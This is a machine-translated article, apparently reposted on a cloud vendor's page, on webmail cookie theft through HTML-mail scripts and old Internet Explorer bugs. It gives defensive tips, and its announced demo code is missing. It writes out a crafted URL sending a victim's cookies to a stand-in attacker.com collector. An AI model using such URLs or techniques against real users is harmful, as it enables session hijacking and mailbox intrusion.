Webmail Offensive and defensive combat (6)

Source: Internet
Author: User
Tags object error handling modify domain domain name access
Web If an attacker can get a user's webmail cookie information, it can easily invade the user's webmail. How does an attacker get the cookie information of a user webmail? If an attacker installs a trojan on a user's computer, or is able to sniff the user from a network line, then it is not a problem to get cookie information, but that is not the point of our discussion, because all of this is possible, and why bother to get cookie information, Just get the email password.

If the webmail system has a cross-site scripting vulnerability, the attacker can spoof the user for easy access to cookie information, although many sites have this vulnerability, but the webmail system is rare.

An HTML message containing a malicious script program can allow an attacker to obtain webmail cookie information. The script in an HTML message extracts the cookie information for the current webmail, assigns it to a form element, and then automatically submits the form to an attacker, who then obtains cookie session information. Here is a demo program:


GETCOOKIE.CGI is a CGI program that is placed on an attacker's Web server to obtain cookie information submitted by the form and to record or notify the attacker. Of course, attackers will design HTML mail, getcookie.cgi programs more covert, more deceptive, so that users are difficult to detect.

Typically, browsers store cookie information according to the domain name of the Web server, and only send cookie information to a Web server with the same domain name. However, the vulnerability of the browser creates an opportunity for attackers to obtain cookie information for different domain names, such as Internet Explorer, Netscape, and Mozilla, which are widely used browsers. Here are examples of several Internet Explorer browsers (for IE5.0, IE5.5, or IE6.0) leaking cookie information:

(1) An object element in an HTML language is used to embed an external object within the current page, but improper handling of an object element property by an Internet Explorer browser can result in the disclosure of cookie information for any domain, as shown in the following demo code:


(2) The Internet Explorer browser error Handling "about" protocol allows a specially crafted URL request to display or modify cookie information for any domain, for example (the following code is on the same line):

About://www.anydomain.com/

(3) The Internet Explorer browser mistakenly sends the host name before the "%20" (spaces URL-encoded) string in the URL as the domain where the cookie information resides. If an attacker had a domain name "attacker.com", the attacker would make it a generic domain name resolution that would refer "*.attacker.com" to the IP address of the attacker's Web server, "attacker.com" Any subdomain or host name below will be resolved to this IP address, and when the user submits a URL similar to the following, the browser sends the cookie information for the "anydomain.com" domain to the attacker:

http://anydomain.com%20.attacker.com/getcookie.cgi

If an attacker were to obtain webmail's temporary cookie information, the code would be written to the HTML message, which would automatically execute when the user browsed the message, allowing the attacker to obtain temporary cookie information in the current browser. You can also send a URL to get cookie information to the user, tricking the user into opening the URL, so that the attacker can also obtain temporary cookie information.

After the attacker obtains cookie information, if the cookie information contains sensitive information such as passwords, then the attacker can easily invade the user's mailbox, although the webmail system such as Hotmail has occurred in such cases, But the webmail system for cookie information leaking sensitive information is still rare.

After obtaining the cookie information, the attacker also makes the cookie information accessible to the browser to establish a session with the webmail system so that it can invade the user's webmail. In the case of persistent cookie information, an attacker would have to copy this information into his or her own cookie file, which would allow the browser to access the cookie information to establish a session with the webmail system, but the temporary cookie information is stored in memory and is not easily accessible by the browser.

In order for the browser to access the temporary cookie information, an attacker can edit the cookie information in memory, or modify the browser that exposes the source code to allow the browser to edit the cookie information, but this is not an easy way to The easy way is to use the Achilles program (packetstormsecurity.org Web site has downloads). Achilles is an HTTP proxy server that can load HTTP session information between browsers and Web servers, and can edit HTTP sessions and temporary cookie information before the broker forwards data.

The webmail system should avoid the use of persistent cookie session tracking so that attackers cannot easily succeed in cookie session attacks. To prevent cookie session attacks, users can take the following steps to enhance security:

(1) Set the browser's cookie security level to block all cookies or accept cookies from only a few domains.

(2) Use cookie management tools to enhance system cookie security, such as Cookie Pal, Burnt cookies, etc.

(3) Timely patch to the browser to prevent cookie information leakage.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.